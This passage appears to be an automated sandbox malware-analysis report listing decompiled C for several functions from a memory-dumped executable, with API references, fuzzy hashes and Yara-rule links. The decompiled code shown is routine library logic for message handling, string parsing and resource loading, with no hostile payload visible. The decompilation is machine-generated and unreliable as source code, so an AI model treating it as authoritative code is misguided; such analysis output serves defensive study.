				E004271DA(E0043B6BA, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E0040E6CB(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E0040DF8F();
						}
						L17:
						return E004272B2(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E0040DF8F();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 00424DC8
PeekMessageA.USER32 ref: 00424E22
PeekMessageA.USER32 ref: 00424E39
PeekMessageA.USER32 ref: 00424E73

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: e914693460a366701039cc11f493173081ccd0225336bdf7c47820115a114b29
Instruction ID: 5973ff5ae2ff6bbe06cf0172e1fc7c781233efc4daa66bbe4b72cdc0d41675d6
Opcode Fuzzy Hash: e914693460a366701039cc11f493173081ccd0225336bdf7c47820115a114b29
Instruction Fuzzy Hash: 6F315E71A00225ABEF209FA4ED85E6F73B8FF44304F51492EF552A62D1D774AA40CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00417F71, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00417F71(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E0042A3C2(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E0042A3C2( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E0042A2F2( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E0042A203();
						} else {
							_t23 = E0042A1DA();
						}
						L17:
						return E0042569C(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}

APIs

CharNextA.USER32(?), ref: 00417FC8

Part of subcall function 0042A3C2: __ismbcspace_l.LIBCMT ref: 0042A3C8

CharNextA.USER32(00000000), ref: 00417FE5
_strtol.LIBCMT ref: 00418010
_strtoul.LIBCMT ref: 00418017

Part of subcall function 0042A203: strtoxl.LIBCMT ref: 0042A223

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: 2638da4993466c2773c4beb52b6204f88b9adedd56d6812a14930e975aec3612
Instruction ID: fa9e7c45f595be2051f2ee94049ba6aca390518ee0a1daf640d5e113ed6d46a1
Opcode Fuzzy Hash: 2638da4993466c2773c4beb52b6204f88b9adedd56d6812a14930e975aec3612
Instruction Fuzzy Hash: B72105726041149BCB20EB759C41BEBBBB8AF59314F51006BF984D7240DB78DD828B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CEC8, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041CEC8(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E0041CE65( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

APIs

SafeArrayDestroy.OLEAUT32 ref: 0041CEE9
CoTaskMemFree.OLE32(?), ref: 0041CF6C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: 7b9b03ece6cf9f21693732497ce27a94767853dffeb6a42d7859361abe70c2a0
Instruction ID: 6592ffaa93fc67471968f81d5582b366d4950fb58849822c9d831fb630cdefec
Opcode Fuzzy Hash: 7b9b03ece6cf9f21693732497ce27a94767853dffeb6a42d7859361abe70c2a0
Instruction Fuzzy Hash: AD117230584206ABDB259F69EDC8BE77766EF00741B14441AF959C63D0C739DC82CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA50, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041BA50(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t65;
				void* _t66;

				_t66 = __eflags;
				_push(0x30);
				E004271DA(E0043AC25, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t65 - 0x18)) = 0;
				 *((intOrPtr*)(_t65 - 0x1c)) = 0x43f410;
				_t63 =  *((intOrPtr*)(_t65 + 8));
				 *(_t65 - 4) = 0;
				E0040E6CB(_t65 - 0x14, _t66,  *((intOrPtr*)(_t63 - 0xb0)));
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t65 + 0xc)));
					_t61 = E0041439F(0, __edx, __edi, _t63, __eflags);
					GetRgnBox( *(_t61 + 4), _t65 - 0x2c);
					IntersectRect(_t65 - 0x3c, _t65 - 0x2c, _t63 - 0x9c);
					_t44 = EqualRect(_t65 - 0x3c, _t65 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t65 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t63 + 0x64))(_t63, _t55);
						 *(_t65 - 4) = _t55;
						_t64 = _t46;
						if( *(_t65 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t65 - 0x14)));
							_push(_t55);
							E0040DF8F();
						}
						_t55 = _t64;
						L5:
						 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t65 - 0x1c)) = 0x43de94;
						E00414400(_t65 - 0x1c);
						return E004272B2(_t55);
					}
					_push(_t61);
					E0041A618( *((intOrPtr*)( *((intOrPtr*)(_t63 - 0xac)) + 0x20)));
					__eflags =  *(_t65 - 0x10);
					 *(_t65 - 4) = 0;
					if( *(_t65 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t65 - 0x14)));
						_push(0);
						E0040DF8F();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t65 + 0x10)));
				goto L2;
			}

APIs

__EH_prolog3.LIBCMT ref: 0041BA57
GetRgnBox.GDI32(?,?), ref: 0041BAD2
IntersectRect.USER32 ref: 0041BAE7
EqualRect.USER32 ref: 0041BAF5

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: b81a1bff1303f9d65d2710fa88f8fdeec9efe10be30b700777f64474b8b6e4ed
Instruction ID: 6e5861cc58b4ae00a5371a8c93efb1e777733a2a56ae9058c611aef19aa2f4a0
Opcode Fuzzy Hash: b81a1bff1303f9d65d2710fa88f8fdeec9efe10be30b700777f64474b8b6e4ed
Instruction Fuzzy Hash: 0C212A71D00209EFCB11EFA5D8819EEBBB8BF08304F00856AF515A3251CB389A55CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 10010909, Relevance: 6.1, APIs: 4, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10010909(signed int* __ecx, void* __edx, void* __edi, void* _a4, intOrPtr _a8, long _a12) {
				char _v8;
				intOrPtr _t12;
				intOrPtr _t15;
				signed int _t18;
				void* _t28;
				char* _t30;
				signed int* _t33;

				_t28 = __edx;
				_push(__ecx);
				_t33 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					_t12 = 0x1000000;
				} else {
					_t2 =  &(_t33[0x50]); // 0x140
					_t30 = _t2;
					GetCurrentDirectoryA(0x104, _t30);
					_t15 =  *((intOrPtr*)( &(_t33[0x4f]) + strlen(_t30)));
					if(_t15 != 0x5c && _t15 != 0x2f) {
						strcat(_t30, "\\");
					}
					if(_a12 != 1 || SetFilePointer(_a4, 0, 0, 1) != 0xffffffff) {
						if(E1000F6D6(_a4, _a8, _a12,  &_v8) != 0) {
							_t18 = E1000FB7B(_t28, _t17);
							 *_t33 = _t18;
							asm("sbb eax, eax");
							_t12 = ( ~_t18 & 0x0000fe00) + 0x200;
						} else {
							_t12 = _v8;
						}
					} else {
						_t12 = 0x2000000;
					}
				}
				return _t12;
			}

0x10010909
0x1001090c
0x1001090e
0x10010913
0x100109b1
0x10010923
0x10010924
0x10010924
0x10010930
0x1001093c
0x10010946
0x10010952
0x10010958
0x1001095e
0x10010992
0x1001099a
0x1001099f
0x100109a4
0x100109aa
0x10010994
0x10010994
0x10010994
0x10010974
0x10010974
0x10010974
0x1001095e
0x100109b8

APIs

GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,00000000,?,10011545,00000000,?,00000000,00000000,?,100115A6,00000000,00000000,00000002), ref: 10010930
strlen.MSVCRT ref: 10010937
strcat.MSVCRT(00000140,10025E60,?,10011545,00000000,?,00000000,00000000,?,100115A6,00000000,00000000,00000002,?,?,1000646A), ref: 10010952
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,10011545,00000000,?,00000000,00000000,?,100115A6,00000000,00000000,00000002,?), ref: 10010969

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: CurrentDirectoryFilePointerstrcatstrlen
String ID:
API String ID: 1952800545-0
Opcode ID: c2b74216776c76551452206280205f8560fa2200da4556146326039a103ee234
Instruction ID: 85861c50514052f4a38092e8d025dc1a309c090c1b706325e074663b7a71e91a
Opcode Fuzzy Hash: c2b74216776c76551452206280205f8560fa2200da4556146326039a103ee234
Instruction Fuzzy Hash: 60110632600306AFFB21CB64DC91FDA37A4EB057B0F500619F6E19D0E2E7B1E9C19640

Uniqueness

Uniqueness Score: -1.00%

Function 00415530, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00415530(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t31 = __ebx;
				_push(4);
				E004271DA(E0043A538, __ebx, __edi, __esi);
				_t35 = E0040A3C7(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E0041551A(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E00429326( &_a4, 0x448844);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E00414516(_t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

APIs

__EH_prolog3.LIBCMT ref: 00415537

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

__CxxThrowException@8.LIBCMT ref: 0041556D
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,00401099,00000000,00000000,00000000,?,?,00448844,00000004,00401D16,?,0040568B,80070057), ref: 00415596

Part of subcall function 00414516: _wctomb_s.LIBCMT ref: 00414526

LocalFree.KERNEL32(00401099,00401099,00000000,8E7DE579), ref: 004155BF

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: 0d72671eee02e48caac66a4637e4ad43f6b9d7f32962a9397a3a3e597e0908f4
Instruction ID: 0e3807eedf53c79759ce1e4240ded00668994b3f669a947a509e54d3546cfa04
Opcode Fuzzy Hash: 0d72671eee02e48caac66a4637e4ad43f6b9d7f32962a9397a3a3e597e0908f4
Instruction Fuzzy Hash: 2E119171614248FFDB00DFA4DC419EE3BAAFF08358F10852AF915CA2D1D731C9508B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4E7, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040C4E7(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E0040E67F(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 0040C50D
LoadResource.KERNEL32(?,00000000), ref: 0040C515
LockResource.KERNEL32(00000000), ref: 0040C527
FreeResource.KERNEL32(00000000), ref: 0040C571

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: c5d419951ce71152c8b9a79ed25944e7f7c4a3439dcf843d114cd39df39cced2
Instruction ID: 452ad7219b658c0123a1ad20f4e61f84202e93c84e9552a1bdb920e1fafa372e
Opcode Fuzzy Hash: c5d419951ce71152c8b9a79ed25944e7f7c4a3439dcf843d114cd39df39cced2
Instruction Fuzzy Hash: DB118B38500721FBCB24AF65DC88AABB7B8EF00765B10427AE84263690D778ED40D754

Uniqueness

Uniqueness Score: -1.00%

Function 0040B049, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040B049(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E004271DA(E0043990F, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E0040D409(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x43d84c;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E004278B1( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E0040E67F(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E00415838(_t46);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E0040ACB5(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E004272B2(_t51);
			}

APIs

__EH_prolog3.LIBCMT ref: 0040B050

Part of subcall function 0040D409: __EH_prolog3.LIBCMT ref: 0040D410

__strdup.LIBCMT ref: 0040B072
GetCurrentThread.KERNEL32 ref: 0040B09F
GetCurrentThreadId.KERNEL32 ref: 0040B0A8

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: d08cbb42f7829d8fc1eb43041b58f2a8b390b29b8eccb72e1eb7ae40a5bd5ba6
Instruction ID: e3dbe98dd3ec71c2ad8b397099d7e64109d9ebff292d09053dae40381d84b132
Opcode Fuzzy Hash: d08cbb42f7829d8fc1eb43041b58f2a8b390b29b8eccb72e1eb7ae40a5bd5ba6
Instruction Fuzzy Hash: 1021B0B0800B00CFC3219F3A914564AFBF8BFA4304F10892FE5AA87761D7B4A441CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5DA, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040B5DA(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E0040E67F(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 0040B5FE
LoadResource.KERNEL32(?,00000000), ref: 0040B60A
LockResource.KERNEL32(00000000), ref: 0040B618
FreeResource.KERNEL32(00000000), ref: 0040B646

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: b58ae0d85b09dff1975f10736891b940827677274e0d18c4022cf9f07116e95f
Instruction ID: 91548c4a369eca74d0a45b863ff4c739adc9bab732584e947e77df1b70f85c74
Opcode Fuzzy Hash: b58ae0d85b09dff1975f10736891b940827677274e0d18c4022cf9f07116e95f
Instruction Fuzzy Hash: BF114C71600209EFDB109F65D888AAFBBB9EF04360F04847AF905A72A0CB75DD00DF69

Uniqueness

Uniqueness Score: -1.00%

Function 004129EB, Relevance: 6.1, APIs: 4, Instructions: 55
